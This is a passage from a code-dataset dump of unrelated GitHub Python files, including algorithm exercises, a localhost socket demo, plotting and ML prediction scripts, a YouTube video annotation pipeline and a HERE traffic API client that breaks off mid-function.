context\n","repo_name":"BraedenYoung/SimpleDjangoBlog","sub_path":"devblog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20770374964","text":"import os\nfrom queue import Queue\nfrom VideoProducer import VideoProducer\nfrom VideoConsumer import VideoConsumer\nfrom ExcelWriter import ExcelWriter\n\nif __name__ == \"__main__\":\n model_Path = r\"D:\\desk\\3.1\\SD\\Project\\Model\\acute egret 2nd blue object novelty TA h.h5\" # Training model path - Change to your pc path\n folder_path = r\"D:\\desk\\3.1\\SD\\Project\\Frames\\acute egret 2nd blue object novelty TA h\" # Path for frames folder - Change to your pc path\n video_Path = r\"D:\\desk\\3.1\\SD\\Project\\Video\\acute egret 2nd blue object novelty TA h.mp4\" # path to video - Change to your pc path\n video_name = \"acute egret 2nd blue object novelty TA h\" # Video name - Change to your video name\n sheet_path = r\"D:\\desk\\3.1\\SD\\Project\\Model\" # Path to save excel sheet - Change to your pc path\n\n sheet = r\"{}\\{}.xlsx\".format(sheet_path, video_name)\n\n q = Queue()\n ExcelQ = Queue()\n DependcisQ = Queue()\n shape = (128, 128)\n\n folder_list = []\n\n for folder in os.listdir(folder_path):\n if os.path.isdir(os.path.join(folder_path, folder)):\n folder_list.append(folder)\n else:\n print(\"Incorrect Path !!\")\n\n classes = folder_list\n\n P = VideoProducer(q, DependcisQ, video_Path, model_Path, classes, shape)\n C = VideoConsumer(q, DependcisQ, ExcelQ)\n W = ExcelWriter(ExcelQ, sheet)\n P.start()\n C.start()\n W.start()\n\n P.join()\n C.join()\n W.join()\n","repo_name":"MohamedAanwar/Software_Dev_2023","sub_path":"03 processing/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"15192447405","text":"#!/usr/bin/env python\n\"\"\" Adds links in the manual pages to tutorials that utilize the functions\"\"\"\n\nimport os\n\ndef processfile(petsc_dir,dir,file,keyre,mdict,uses):\n '''Find all functions used in the tutorial and add links to the manual page for the function'''\n #print('Processing '+os.path.join(dir,file))\n with open(os.path.join(dir,file),'r') as fd:\n text = fd.read()\n found = list(set(keyre.findall(text)))\n for i in found:\n if len(uses[i]) < 10:\n uses[i].append(os.path.join(dir,file))\n\ndef processdir(petsc_dir,dir,keyre,mdict,uses):\n '''Loop over tutorials, call processfile() on each'''\n #print('Processing '+dir)\n for file in os.listdir(dir):\n if os.path.isfile(os.path.join(dir,file)) and (file.endswith('.c') or file.endswith('.cxx')): processfile(petsc_dir,dir,file,keyre,mdict,uses)\n\ndef loadmanualpagescit(petsc_dir):\n '''Loads and parses the manualpages.cit file generated by Sowing doctext'''\n import re\n mdict = {}\n PATTERN = re.compile(r'man:\\+(.*)\\+\\+(.*)\\+\\+\\+\\+man\\+\\.\\./(.*)#.*')\n EXCLUDE_PATTERN = re.compile('PetscCall|Petsc[A-Z]*Int|PetscReal|PetscScalar|PetscBool|PetscComplex|PetscErrorCode|SETERR|PetscLog|PETSC_FALSE|PETSC_TRUE')\n with open(os.path.join(petsc_dir,'doc','manualpages','manualpages.cit'),'r') as fd:\n text = fd.read()\n for line in text.split():\n m = re.match(PATTERN, line)\n # print('Manual page '+m.group(1)+' location '+m.group(3))\n if re.match(EXCLUDE_PATTERN,m.group(1)): continue\n mdict[m.group(1)] = m.group(3)\n # sort to find enclosing names first\n mdict = dict(sorted(mdict.items(), key=lambda item: len(item[0]), reverse = True))\n keyre = re.compile('|'.join(list(mdict.keys())))\n uses = {i: [] for i in mdict.keys()}\n return keyre,mdict,uses\n\ndef main(petsc_dir):\n keyre,mdict,uses = loadmanualpagescit(petsc_dir)\n for dirpath, dirnames, filenames in os.walk(os.path.join(petsc_dir,'src'),topdown=True):\n dirnames[:] = [d for d in dirnames if d not in ['output', 'ftn-custom', 'f90-custom', 'ftn-auto', 'f90-mod', 'tests', 'binding']]\n if dirpath.endswith('tutorials'):\n processdir(petsc_dir,dirpath,keyre,mdict,uses)\n\n for i in mdict:\n if len(uses[i]) > 0:\n manpage = os.path.join(petsc_dir,'doc','manualpages',mdict[i])\n with open(manpage,'a') as fd:\n fd.write('\\n## Examples\\n')\n for j in uses[i]:\n file = j.replace(petsc_dir+'/','')\n fd.write(''+file+'
\\n')\n\nif __name__ == \"__main__\":\n main(os.path.abspath(os.environ['PETSC_DIR']))\n","repo_name":"petsc/petsc","sub_path":"doc/build_man_examples_links.py","file_name":"build_man_examples_links.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","stars":349,"dataset":"github-code","pt":"96"} +{"seq_id":"70567899516","text":"from statistics import median_low\n\ncount = int(input())\nfor i in range(count):\n data = input().split(' ')\n data = [int(d) for d in data]\n data = data[1:]\n data.sort()\n \n mid = median_low(data)\n\n dis = 0\n for address in data:\n dis += abs(mid-address)\n print(dis)","repo_name":"fdsf53451001/leetcode","sub_path":"uva10041.py","file_name":"uva10041.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"8984199101","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\nimport platform\n\n\nif platform.system() == \"Linux\":\n dir_name = ''\nelse:\n dir_name = os.path.dirname(__file__).rsplit(\"/\", 1)[0]\n\nplot_dir = os.path.join(dir_name, \"data\", \"plots\")\nuse_dirs = ['Test', 'Train']\n\n\ndef heat_map(set_type, dataset):\n # Correlation Matrix Heatmap\n f, ax = plt.subplots(figsize=(10, 6))\n\n correlation = dataset.corr()\n\n hm = sns.heatmap(round(correlation,2), annot=True, ax=ax, cmap=\"coolwarm\", fmt='.2f',\n linewidths=.05, annot_kws={\"size\": 6})\n\n f.subplots_adjust(top=0.93)\n #f = f.suptitle(type + ' Audio Data Correlation Heatmap', fontsize=14, va=\"top\")\n # plt.show()\n plt.savefig(os.path.join(plot_dir, set_type.lower()+\"_heatmap.png\"), bbox_inches='tight')\n\n\ndef pairwise_scatter(set_type, headers, dataset):\n # Scatter Plot\n cols = headers\n pp = sns.pairplot(dataset[cols], hue='TrafficIncident', height=1.8, aspect=1.8,\n palette={\"Yes\": \"#7A81A3\", \"No\": \"#76C6C9\"},\n plot_kws=dict(edgecolor=\"black\", linewidth=0.5))\n\n fig = pp.fig\n\n fig.subplots_adjust(top=0.93, wspace=0.3)\n #f = fig.suptitle(type + 'Audio Data Pairwise Plots', fontsize=14, va=\"top\")\n # plt.show()\n plt.savefig(os.path.join(plot_dir, set_type.lower()+\"_scatter.png\"), bbox_inches='tight')\n\n\ndef main():\n\n for dir_type in use_dirs:\n\n csv_file = pd.read_csv(os.path.join(os.path.dirname(__file__).rsplit(\"/\", 1)[0],\n \"data\", dir_type.lower() + \"_traffic_audio.csv\"),header=0)\n\n csv_headers = list(csv_file.columns.values)\n dataset = csv_file.drop(\"reference\", axis=1)\n headers = list(dataset.columns.values)\n attribute_headers = headers[0:len(headers) - 1]\n\n heat_map(dir_type, dataset)\n pairwise_scatter(dir_type, headers, dataset)\n\n\nmain()\n\n","repo_name":"Steveguile/AuditorySampling","sub_path":"data_miner/Plotter.py","file_name":"Plotter.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"23599819138","text":"from http import server\nimport socket\n\n# TCP/IP 소켓 생성\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# 소켓 연결\nserver_address = (\"localhost\", 2222)\nsock.bind(server_address)\n\n# 클라이언트로부터의 연결을 감청\nsock.listen(1)\nprint(\"Waiting for a client to connect\")\nclient, client_port = sock.accept()\nprint(\"Connection from client %s:%s\" % client_port)\n\n# 클라이언트로부터의 요청을 수신\nrequest = client.recv(14)\nprint(f'Client sent \"{request.decode()}\"')\n\n# 응답 송신\nreply = b\"And Beyond!\"\nprint(f'Server replies \"{reply.decode()}\"')\nclient.sendall(reply)\n\nclient.close()\n","repo_name":"sookyeongyeom/computer-science-overview","sub_path":"code/socket/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71859213756","text":"#23.01.06\n#트리의 지름\n#골드4\n\n#dijkstra: 시간초과(O(N^2logN))\nimport sys\nfrom heapq import heappop, heappush\nfrom collections import defaultdict\ninput = sys.stdin.readline\nINF = sys.maxsize\n\ndef dijkstra(start):\n q = [(0, start)]\n distance = [INF]*n\n distance[start-1] = 0\n\n while q:\n dis, cur = heappop(q)\n\n if dis > distance[cur-1]:\n continue\n\n for i in edges[cur]:\n tmp = dis+i[1]\n\n if tmp < distance[i[0]-1]:\n distance[i[0]-1] = tmp\n heappush(q, (tmp, i[0]))\n\n return distance\n\nn = int(input())\nedges = defaultdict(list)\ndis = set()\n\nfor _ in range(n-1):\n u, v, w = map(int, input().split())\n edges[u].append([v, w])\n edges[v].append([u, w])\n\nanswer = 0\nleaves = []\nfor i in edges.keys():\n if len(edges[i]) == 1:\n leaves.append(i)\n \nfor i in leaves:\n answer = max(answer, max(dijkstra(i)))\n\nprint(answer)\n\n#dfs(재귀): 시간초과\n#dfs(스택): 통과(O(N^2))\nimport sys\nfrom collections import defaultdict, deque\ninput = sys.stdin.readline\n\ndef dfs(start):\n global answer\n visited = [0]*(N+1)\n need_visited = deque([[start, 0]])\n visited[start] = 1\n\n while need_visited:\n cur, weight = need_visited.pop()\n if answer < weight:\n answer = weight\n\n for n, w in dic[cur]:\n if visited[n] == 0:\n visited[n] = 1\n need_visited.append([n, weight+w])\n\nN = int(input())\ndic = defaultdict(list)\n\nfor _ in range(N-1):\n u, v, w = map(int, input().split())\n dic[u].append((v, w))\n dic[v].append((u, w))\n\nleaves = []\nfor i in dic.keys():\n if len(dic[i]) == 1:\n leaves.append(i)\n\nanswer = 0\nfor i in leaves:\n dfs(i)\nprint(answer)\n\n# bfs: 통과(O(N^2))\nimport sys\nfrom collections import defaultdict, deque\ninput = sys.stdin.readline\n\ndef bfs(start):\n global answer\n q = deque([[start, 0]])\n visited = [0] * (N+1)\n visited[start] = 1\n\n while q:\n cur, weight = q.popleft()\n if answer < weight:\n answer = weight\n \n for n, w in dic[cur]:\n if visited[n] == 0:\n visited[n] = 1\n q.append([n, weight + w])\n\nN = int(input())\ndic = defaultdict(list)\n\nfor _ in range(N-1):\n u, v, w = map(int, input().split())\n dic[u].append((v, w))\n dic[v].append((u, w))\n\nleaves = []\nfor i in dic.keys():\n if len(dic[i]) == 1:\n leaves.append(i)\n\nanswer = 0\nfor i in leaves:\n bfs(i)\nprint(answer)","repo_name":"915dbfl/youlAlgorithm","sub_path":"zip/graph/dfs_bfs/diameter_of_the_tree(gold4)⭐.py","file_name":"diameter_of_the_tree(gold4)⭐.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"7958475141","text":"from PIL import Image\nimport glob, numpy as np\nfrom keras.models import load_model\n\n#예측 데이터 불러오기\ncaltech_dir = \"./trensfer/test\"\n\nX = []\nfilenames = []\nfiles = glob.glob(caltech_dir+\"/*.*\")\n\nfor i, f in enumerate(files):\n pixel = open(f,\"r\")\n y = pixel.read()\n pixel.close()\n filenames.append(f)\n \n y = y.replace(\"'\",\"\")\n y = y.replace(\"[\",\"\")\n y = y.replace(\"]\",\"\")\n y = y.replace(\"\\n\",\"\")\n y = y.split(\",\")\n \n for j in range(0,len(y)):\n y[j] = float(y[j])\n\n data = np.array(y)\n data = data.reshape(8,8)\n X.append(data)\n\nX = np.array(X)\nX = X.reshape(len(X),8,8,1)\n\n#예측 모델 불러와서 모델 예측\nmodel3 = load_model('./model/multi_img_classification.model')\n\nprediction = model3.predict(X)\nnp.set_printoptions(formatter={'float': lambda x: \"{0:0.3f}\".format(x)})\ncnt = 0\n\n#모든 모델에 대한 예측값 보여주\nfor i in prediction:\n pre_ans = i.argmax()\n print(i)\n print(pre_ans)\n pre_ans_str = ''\n \n if pre_ans >= 0.8:\n pre_ans_str = \"null\"\n elif pre_ans >= 0.8:\n pre_ans_str = \"noise\"\n else:\n pre_ans_str = \"finger\"\n \n if i[0] >= 0.8 :\n print(\"해당 \"+filenames[cnt].split(\"\\\\\")[1]+\"이미지는 \"+pre_ans_str+\"로 추정됩니다.\")\n if i[1] >= 0.8:\n print(\"해당 \"+filenames[cnt].split(\"\\\\\")[1]+\"이미지는 \"+pre_ans_str+\"으로 추정됩니다.\")\n if i[2] >= 0.8:\n print(\"해당 \"+filenames[cnt].split(\"\\\\\")[1]+\"이미지는 \"+pre_ans_str+\"로 추정됩니다.\")\n cnt += 1\n\n","repo_name":"AIZEUN/Adafruit88XXCNN","sub_path":"thermal_test_predict.py","file_name":"thermal_test_predict.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"73312815675","text":"# Look at to the case:\n# https://www.hackerrank.com/challenges/grading/problem\n\ndef gradingStudents(grades):\n '''\n res = []\n for grade in grades:\n if grade % 5 > 2 and grade >= 38:\n grade += 5 - (grade % 5)\n res.append(grade)\n\n return res\n '''\n # One line solution\n return [(e + 5 - (e % 5) if e % 5 > 2 and e >= 38 else e) for e in grades]\n\n\nif __name__ == '__main__':\n grades_count = int(input())\n\n grades = []\n\n for _ in range(grades_count):\n grades_item = int(input())\n grades.append(grades_item)\n\n result = gradingStudents(grades)\n\n print(*result, sep=\"\\n\")\n","repo_name":"tryoasnafi/hackerrank","sub_path":"problems/001_grading_students/grading_students.py","file_name":"grading_students.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"30964689389","text":"#!/usr/bin/python\n\nimport os\nos.chdir('../../')\n\nfrom pymongo import MongoClient\nfrom tqdm import tqdm\nimport time\n\nfrom youtubeauditframework.utils.YouTubeAuditFrameworkConfig import Config\nfrom pseudoscientificvideosdetection.PseudoscienceClassifier import PseudoscienceClassifier\nfrom youtubehelpers.YouTubeVideoDownloader import YouTubeVideoDownloader\n\n\nclass DownloadAnnotateExperimentsVideos(object):\n \"\"\"\n Class that downloads all the required information and annotates all the videos encountered during our experiments\n \"\"\"\n def __init__(self):\n #\n # MongoDB Configuration\n #\n # Host and Port\n self.client = MongoClient('localhost', 27017)\n # DB name\n self.db = self.client[Config.DB_NAME]\n # Collections\n # self.audit_framework_videos_col = self.db.audit_framework_videos\n self.audit_framework_videos_col = self.db[Config.AUDIT_FRAMEWORK_VIDEOS_COL]\n\n # Create a YouTube Video Downloader Object\n self.VIDEO_DOWNLOADER = YouTubeVideoDownloader()\n\n # Create Video Classifier Object\n self.VIDEO_ANNOTATOR = PseudoscienceClassifier()\n return\n\n def get_all_notannotated_videos(self):\n \"\"\"\n Method that returns a list with all the YouTube Video encountered during the\n experiments and have not been annotated\n :return:\n \"\"\"\n all_notannotated_videos = self.audit_framework_videos_col.find({\n '$and': [\n {'classification.classification_category': None}\n ]\n })\n return [video_info['id'] for video_info in all_notannotated_videos]\n\n def delete_videos_labels(self):\n \"\"\"\n Method that deletes the label of all the videos in the collection\n \"\"\"\n self.audit_framework_videos_col.update_many({}, {'$unset': {'classification': 1}})\n return\n\n def annotate_videos(self):\n \"\"\"\n Method that annotates all the non-annotated videos\n :return:\n \"\"\"\n # Get all not annotated videos\n all_videos = self.get_all_notannotated_videos()\n\n # Download the information adn annotate videos\n progressBar = tqdm(total=len(all_videos))\n for video_id in all_videos:\n print('\\n--- [VIDEO: {}] DOWNLOADING INFORMATION AND ANNOTATING VIDEO'.format(video_id))\n # Get Video Details\n video_details = self.audit_framework_videos_col.find_one({'id': video_id})\n\n # Download Video Comments\n self.VIDEO_DOWNLOADER.download_video_comments(video_id=video_id)\n\n # Download Video Transcript\n self.VIDEO_DOWNLOADER.download_video_transcript(video_id=video_id)\n\n # Annotate Video\n video_label, confidence_score = self.VIDEO_ANNOTATOR.classify(video_details=video_details)\n\n # Update Video Information\n self.audit_framework_videos_col.update_one({'id': video_id}, {'$set': {'classification.classification_category': video_label}})\n\n # Sleep to avoid IP address banning when downloading videos' transcript\n # IMPORTANT: Don't change this to less than 5 seconds\n time.sleep(5)\n progressBar.update(1)\n progressBar.close()\n return\n\n\nif __name__ == '__main__':\n # Init variables\n DELETE_VIDEO_LABELS = False\n ANNOTATE_VIDEOS = True\n\n # YOUTUBE_DATA_API_KEY = ''\n # if YOUTUBE_DATA_API_KEY == '':\n # exit('Please fill your YouTube Data API Key')\n\n # Create a Video Annotator Object\n experimentsVideosAnnotatorObject = DownloadAnnotateExperimentsVideos()\n\n # Delete Video Labels\n if DELETE_VIDEO_LABELS:\n experimentsVideosAnnotatorObject.delete_videos_labels()\n\n # Annotate Experiments Videos\n if ANNOTATE_VIDEOS:\n experimentsVideosAnnotatorObject.annotate_videos()","repo_name":"kostantinos-papadamou/pseudoscience-paper","sub_path":"youtubeauditframework/helpers/download_annotate_experiment_videos.py","file_name":"download_annotate_experiment_videos.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"96"} +{"seq_id":"177036920","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n rightMostView = []\n\n def rightSideView(self, root: Optional[TreeNode]) -> List[int]:\n depthOfTree = self.getDepthOfTree(root)\n self.rightMostView = [None for x in range(depthOfTree)]\n depth = 0\n self.findRightmostElementAtLevel(root, depth)\n return self.rightMostView\n\n \n def findRightmostElementAtLevel(self,root,depth):\n if(not root):\n return False\n if(self.rightMostView[depth] == None):\n self.rightMostView[depth] = root.val\n self.findRightmostElementAtLevel(root.right,depth+1)\n self.findRightmostElementAtLevel(root.left,depth+1)\n print(self.rightMostView)\n \n \n def getDepthOfTree(self, root):\n if(not root):\n return 0\n l_depth = self.getDepthOfTree(root.left)\n r_depth = self.getDepthOfTree(root.right)\n if(l_depth > r_depth):\n return l_depth+1\n else:\n return r_depth+1","repo_name":"hhk998402/leetcode-diary","sub_path":"199. Binary Tree Right Side View/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"39695122101","text":"from backend.settings import MEDIA_BASE_URL, DEBUG, MEDIA_ROOT\nfrom django.core.files.storage import FileSystemStorage\n\nimport json\nimport csv\nimport os\nimport numpy as np\nfrom pprint import pprint\nfrom time import time\n\nfrom taxonomy.models import Family, Subfamily, Genus, Species\nfrom image.models import Image\n\nstrt_time = time()\n\nHIER_ORDER = ['species', 'genus', 'subfamily', 'family']\nprob_order = [x+'_prob' for x in HIER_ORDER]\nprediction_keys = HIER_ORDER + prob_order\nNUM_RESULTS = 5\nNUM_EXAMPLE_IMAGES = 6\n\n#Model class should not have to class Tensorflow Container?\n\n# in hierarchy model subclass\ndef load_class_hierarchy_map(model_record):\n \n class_map_str = model_record.class_hierarchy_map\n class_hierarchy_map = json.loads(class_map_str)\n\n return class_hierarchy_map\n\n\n#part of generic base model class\ndef softmax(x):\n\n \"\"\"Compute softmax values for each sets of scores in x.\"\"\"\n e_x = np.exp(x - np.max(x))\n return e_x / e_x.sum()\n\n#in hierarchy model subclass\ndef calc_class_probas(model_raw_response, class_hierarchy_map):\n \"\"\"\n sum up the probabilites at each hierarchical level\n \"\"\"\n\n probas = {}\n probas[HIER_ORDER[0]] = softmax(model_raw_response)\n\n for i in range(1, len(HIER_ORDER)):\n \n parent_key = HIER_ORDER[i]\n child_key = HIER_ORDER[i-1]\n probas[parent_key] = np.bincount(class_hierarchy_map[parent_key], weights=probas[child_key])\n\n return probas\n\n\n#in hierarchy model subclass\ndef calc_top_results(all_class_probas, hier_enco):\n\n # subscript(insert) the probabilities for each level in the hierarchy\n prob_levels = [all_class_probas[key][hier_enco[:,i]] for i, key in enumerate(HIER_ORDER)]\n arr_prob = np.array(prob_levels)\n arr_prob = arr_prob \n\n # multi index sort, from last column in array to first \n # (ie from coarsest to finest hierarchical level / top down) \n sort_keys = np.lexsort(arr_prob)\n\n # take top n results\n top_sorted_keys = sort_keys[::-1][:NUM_RESULTS]\n top_probs = arr_prob.transpose()[top_sorted_keys,:]\n top_classes = hier_enco[top_sorted_keys,:]\n\n return top_classes, top_probs\n\n#NOT in class\ndef query_db_to_make_dict_of_taxonomy_names(species_key):\n \n res_dict = {}\n\n s = Species.objects.get(id=species_key)\n g = Genus.objects.get(species=s.id)\n sf = Subfamily.objects.get(genus=g.id)\n f = Family.objects.get(subfamily=sf.id)\n\n res_dict['species'] = s.name\n res_dict['genus'] = g.name\n res_dict['subfamily'] = sf.name\n res_dict['family'] = f.name\n\n return res_dict\n\n\n#NOT in class\ndef query_example_images(species_key, num_images):\n \n fs = FileSystemStorage()\n\n qs = Image.objects.filter(imageclassification__species_key=species_key)\n res = qs.values('image').distinct()[:num_images].values()\n \n return [fs.url(obj['image']) for obj in res]\n\n#in class\ndef process_model_response(model_record, model_response):\n \n if DEBUG:\n print('model returned: ', model_response.status_code)\n \n model_response_dict = json.loads(model_response.text)\n model_raw_values = model_response_dict['predictions'][0] #these model values are known as logits\n\n if DEBUG:\n print('model_raw_values: ', str(model_raw_values[:15])[:-1], ' ...')\n\n #Load model reference data\n class_hierarchy_map = model_record.class_hierarchy_map\n hier_enco = np.array(model_record.encoded_hierarchy)\n model_key_map = model_record.species_key_map\n\n # create sorted results\n all_class_probas = calc_class_probas(model_raw_values, class_hierarchy_map)\n top_model_classes, top_probs = calc_top_results(all_class_probas, hier_enco)\n\n top_db_classes = [model_key_map[str(m_key[0])] for m_key in top_model_classes]\n\n if DEBUG:\n print('all_class_probas: ', all_class_probas)\n print('top_probs : ', top_probs)\n print('top_classes : ', top_model_classes)\n print('top_db_classes: ', top_db_classes)\n\n predictions = {}\n prob_order = ['species_prob', 'genus_prob', 'subfamily_prob', 'family_prob']\n\n #loop over the classes_probs list to assemble the predictions part of the json response\n \n for i, species_key in enumerate(top_db_classes):\n \n res_dict = query_db_to_make_dict_of_taxonomy_names(species_key)\n probs_dict = dict(zip(prob_order, top_probs[i,:].tolist()))\n res_dict.update(probs_dict)\n\n img_lst = query_example_images(species_key, NUM_EXAMPLE_IMAGES)\n res_dict['example_images'] = img_lst\n res_dict['example_image_0'] = img_lst[0] # included for legacy reasons due to how mobile app consumes the reponse\n res_dict['description'] = \"\"\n res_dict['index'] = species_key\n predictions[i] = res_dict\n\n return predictions","repo_name":"GenieTim/biodex--prediction-api","sub_path":"app/uploadforpredict/prediction_postprocessing.py","file_name":"prediction_postprocessing.py","file_ext":"py","file_size_in_byte":4761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"96"} +{"seq_id":"35384241074","text":"# encoding: utf-8\n'''\nFile: localizable.py\nAuthor: Oliver Zscheyge\nDescription:\n Localizable super class for metrics, rules and reports.\n'''\n\nclass Localizable(object):\n \"\"\"Common interface for Metrics, Rules and Reports.\n \"\"\"\n def __init__(self, ID, language, brief, description):\n \"\"\"Initializer.\n Args:\n ID: ID of the localizable object (unicode string).\n language: Language code, e.g. u\"de\" or u\"en\".\n brief: Brief description of the localizable object.\n description: Long/full description of the localizable object.\n \"\"\"\n super(Localizable, self).__init__()\n self.ID = ID\n self.language = language\n self.brief = brief\n self.description = description\n\n","repo_name":"ooz/Confopy","sub_path":"confopy/analysis/localizable.py","file_name":"localizable.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"96"} +{"seq_id":"3787597965","text":"\"\"\"\r\n必要モジュールロード\r\n\"\"\"\r\nimport sys\r\nimport sklearn.svm\r\nimport pickle\r\n\r\n\r\n\"\"\"\r\n主処理\r\n\"\"\"\r\ndef main():\r\n\r\n # パラメータのバイナリファイルを読み込み、説明変数 X, 目的変数y に格納\r\n X, y = pickle.load(open(sys.argv[1], 'r+b'))\r\n # import pdb; pdb.set_trace()\r\n\r\n # SVM のインスタンス作成\r\n classifier = sklearn.svm.LinearSVC(C = 0.0001)\r\n\r\n # インスタンスに説明変数、目的変数を食わせてモデルを構築\r\n classifier.fit(X, y)\r\n\r\n # モデルをバイナリファイルで保存\r\n pickle.dump(classifier, open(sys.argv[2], 'wb'))\r\n\r\n\r\n\"\"\"\r\nお作法、他ファイルから呼び出された場合は、このスクリプトは実行されない\r\n\"\"\"\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"shinonome128/detectcat","sub_path":"make_model.py","file_name":"make_model.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"74766875194","text":"\"\"\" Full assembly of the parts to form the complete network \"\"\"\n\nfrom __future__ import division\n\nimport torch\nimport torch.nn as nn\nfrom torch.nn.functional import upsample\nfrom modeling.model_utils.non_local_parts import *\nfrom modeling.model_utils.unet_parts import *\nimport torch.nn.functional as F\nfrom modeling.model_utils.da_att import DANetHead\n\nclass NonlocalUNet(nn.Module):\n def __init__(self, backbone,BatchNorm, output_stride, num_classes,freeze_bn=False):\n super(NonlocalUNet, self).__init__()\n self.backbone = backbone\n self.n_classes = num_classes\n self.conv1 = nn.Conv2d(2048, 512, 1, bias=False)\n self.output_stride=output_stride\n if output_stride == 16:\n in_channels=2048\n inputstrides = [1024, 512, 128, 64]\n dilations = [1, 1, 1, 2]\n elif output_stride == 8:\n strides = [1, 2, 1, 1]\n dilations = [1, 1, 2, 4]\n else:\n raise NotImplementedError\n self.net = multi_head_attention_2d(2048, 2048, 2048, 512, 4, 0.5, 'SAME')\n\n self.head1 = DANetHead(64, 64, BatchNorm)\n self.head2 = DANetHead(256, 256, BatchNorm)\n self.head3 = DANetHead(512, 512, BatchNorm)\n self.head4 = DANetHead(2048, 512, BatchNorm)\n self.up1 = Up(1024, 512 //2,BatchNorm)\n self.up2 = Up(512, 256 // 4,BatchNorm)\n self.up3 = Up(128, 64,BatchNorm)\n self.outc = OutConv(64, num_classes)\n self.head= DANetHead(64, num_classes, BatchNorm)\n self.net_out = multi_head_attention_2d(64, 64, 64, num_classes, 4, 0.5, 'SAME')\n if freeze_bn:\n self.freeze_bn()\n\n def forward(self, x):\n #x2 = self.head1(x[5])\n #x3 = self.head2(x[3])\n #x4 = self.head3(x[2])\n x2 = x[5]\n x3 = x[3]\n x4 = x[2]\n #x5 = self.conv1(x[0])\n #x5 = self.head4(x[0])\n x5 = self.net(x[0])\n x = self.up1(x5, x4)\n x = self.up2(x, x3)\n x = self.up3(x, x2)\n logits = self.outc(x)\n #logits = self.net_out(x)\n x = F.interpolate(logits, scale_factor=2, mode='bilinear', align_corners=True)\n return x\n","repo_name":"UESTC-Liuxin/SkmtSeg","sub_path":"modeling/head/nonlocalunet.py","file_name":"nonlocalunet.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"73495601277","text":"import numpy as np\nimport requests\nfrom bs4 import BeautifulSoup\nfrom xml.etree.ElementTree import XML, fromstring, tostring\nfrom datetime import datetime\nimport pandas as pd \nimport sys\nimport matplotlib.pyplot as plt\n\n\nclass HERE_Traffic():\n def __init__(self):\n # collect current datetime\n now = datetime.now()\n self.timestamp = now.strftime(\"%Y%m%d%H%M\")\n \n def credentials(self, APP_ID, APP_CODE):\n '''Please enter HERE API credentials:\n\n API_ID : Enter HERE account application identification.\n APP_CODE : Enter HERE account application code.\n API_KEY: Enter ONLY for traffic incident data. Default value is null.\n '''\n self.APP_ID = APP_ID\n self.APP_CODE = APP_CODE\n\n def bbox(self, lat0, lon0, lat1, lon1):\n '''Bounding-box information for traffic flow.\n '''\n self.lat0 = lat0\n self.lon0 = lon0\n self.lat1 = lat1\n self.lon1 = lon1\n\n def _connect_traffic_flow(self):\n '''Connects to HERE Traffic API using bbox and API credentials. Returns parsed XML response.\n If invalid credentials are used returns error message.\n '''\n \n page = requests.get(f'https://traffic.api.here.com/traffic/6.3/flow.xml?app_id={self.APP_ID}&app_code={self.APP_CODE}&bbox={self.lat0},{self.lon0};{self.lat1},{self.lon1}&responseattributes=sh,fc')\n \n # if credentials are incorrect, prompt error message and kill program.\n if str(page) == '':\n sys.exit(\"Invalid credentials. Please re-enter correct API identification number or code.\")\n else:\n soup = BeautifulSoup(page.text, \"lxml\")\n response = soup.find_all('fi')\n\n return response\n \n def _connect_incident_reports(self):\n '''Connects to HERE Incident API using bbox and API credentials. Returns parsed html response.\n '''\n page = requests.get(f'https://traffic.api.here.com/traffic/6.3/incidents.xml?app_id={self.APP_ID}&app_code={self.APP_CODE}&bbox={self.lat0},{self.lon0};{self.lat1},{self.lon1}&responseattributes=sh,fc')\n soup = BeautifulSoup(page.text, \"html.parser\")\n parsed = soup.find_all(\"trafficml_incidents\")[0]\n\n return parsed\n\n\n def traffic_flow(self):\n '''\n Returns traffic flow information, latitudes, longitudes, road names. \n '''\n # call traffic response \n response = self._connect_traffic_flow()\n # loop through each road and collect road type, road speed limit, actual real-time \n # road speed, road name, and traffic direction. \n a1=[]\n loc_list_hv=[]\n lats=[]\n lons=[]\n speed_uncapped=[]\n speed_capped=[]\n jam_factor=[]\n free_flow_spd=[]\n names = []\n direction=[]\n c=0\n for html_response in response:\n #for j in range(0,len(shps)):\n xml_response = fromstring(str(html_response))\n fc=5\n for road in 